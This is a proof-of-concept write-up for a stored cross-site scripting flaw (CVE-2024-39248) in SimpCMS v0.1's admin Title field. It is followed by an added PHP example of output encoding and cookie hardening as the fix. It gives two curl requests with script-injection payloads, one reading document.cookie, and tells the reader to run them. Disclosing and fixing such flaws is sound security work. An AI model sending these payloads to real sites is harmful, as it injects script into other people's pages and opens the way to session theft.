CVE-2024-39248 PoC: SimpCMS Security Vulnerability

Associated Vulnerability
Title: SimpCMS Security Vulnerability (CVE-2024-39248)
Description: A cross-site scripting (XSS) vulnerability in SimpCMS v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field at /admin.php.
Description
Publication for Cross Site Scripting (XSS) in SimpCMS v0.1 - /SimpCMS/admin.php
Readme
## Exploit Title: SimpCMS v0.1 - Cross Site Scripting (XSS)
## CVE: CVE-2024-39248
## Exploit Author: Jason Jacobs (0xjason_jacobs - Twitter)

## Vendor Homepage: https://sourceforge.net/projects/simpcms/
## Vulnerable endpoint: /SimpCMS/admin.php

A cross-site scripting (XSS) vulnerability in SimpCMS v0.1 allows
attackers to execute arbitrary web scripts or HTML via a crafted
payload injected into the Title field at /admin.php.

### Updated cURL command parameters for the SimpCMS version live on SourceForge:

After logging in to the SimpCMS admin interface, copy your cookie values from the Application tab of the browser's developer tools (Inspect element) and submit the following curl request:

> curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=<script>alert(document.cookie)</script>&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"

![command](command.png)

![poc](poc.png)


### Parameters from the initial CVE submission (Same exploit works):

The parameters initially observed for the SimpCMS software resulted in the following cURL command, but they were later updated:

> curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"

Explanation:
> - curl: The command-line tool for transferring data with URLs.
> - -X POST: Specifies the request method to use (POST).
> - "http://site.com/SimpCMS/admin.php": The URL to which the request is sent.
> - -d "title=<script>alert(document.cookie)</script>&abbrev=random&newSector=": The POST request body; the payload is carried in the title parameter.
> - -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0": The session cookie sent with the request.

Run this command in your terminal to send the POST request with the XSS payload.
Visit the /SimpCMS main site and the XSS will be visible.

CWE: https://cwe.mitre.org/data/definitions/79.html
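
The fix for this class of bug is to encode the stored Title when it is written into HTML. The following is an added example, not SimpCMS code and not part of the original README; the function names are hypothetical, and the two sample titles are the values from the requests above (the second one URL-decoded).

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not taken from the SimpCMS source.

// Defence in depth for the document.cookie payload: an HttpOnly session
// cookie cannot be read by injected script. Call before session_start().
// 'secure' assumes the site is served over HTTPS.
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'samesite' => 'Strict',
        'secure'   => true,
    ]);
}

// Encode a value for an HTML text node or a quoted attribute value.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern: the stored title is concatenated into markup unchanged.
function render_title_unsafe(string $title): string
{
    return '<h2>' . $title . '</h2>';
}

// Hardened pattern: keep the title as submitted, encode it at output time.
function render_title_safe(string $title): string
{
    return '<h2>' . e($title) . '</h2>';
}

harden_session_cookie();

$titles = ['<script>alert(document.cookie)</script>', '<body onload=alert(1)>'];
foreach ($titles as $title) {
    $safe  = render_title_safe($title);
    $inner = substr($safe, 4, -5); // text between <h2> and </h2>
    if (strpbrk($inner, '<>') !== false) {
        throw new RuntimeException('markup survived encoding');
    }
    echo 'unsafe: ', render_title_unsafe($title), "\n";
    echo 'safe:   ', $safe, "\n";
}
```

Encoding belongs at every place the title is printed (admin list, main site, page `<title>`), since the stored value itself is left as submitted.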